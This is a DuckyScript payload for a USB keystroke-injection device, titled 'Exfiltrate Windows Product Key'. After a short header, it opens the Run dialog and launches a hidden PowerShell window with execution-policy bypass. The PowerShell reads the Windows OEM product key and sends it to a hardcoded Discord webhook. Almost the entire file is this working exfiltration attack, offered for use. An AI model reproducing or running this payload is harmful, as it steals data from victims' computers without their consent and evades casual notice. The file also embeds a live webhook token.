REM ###################################################
REM #                                                 #
REM # Description template: Aleff (Link down)         #
REM # https://github.com/aleff-github/                #
REM # Title        : Exfiltrate Windows Product Key   #
REM # Author       : NazarHK                          #
REM # Version      : 1.0                              #
REM # Target       : Windows 10-11                    #
REM #                                                 #
REM ###################################################

DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -ep bypass "$u='https://discord.com/api/webhooks/1322635423369003129/Z0eJb-VnYmu33ZOYHl6ESyQybDtgZ4ODMgbV22ifsRivbQr8UZlhlISrv9O9_h8sRf3K';$k=(wmic path softwarelicensingservice get OA3xOriginalProductKey|Select-String -Pattern '\w{5}-\w{5}-\w{5}-\w{5}-\w{5}' | foreach { $_.Matches.Value })-join '';$k=[string]::IsNullOrEmpty($k)?'No key':$k;irm -Uri $u -Method Post -Body @{content='PRODUCT KEY: '+$k} | ConvertTo-Json -Depth 1"
ENTER
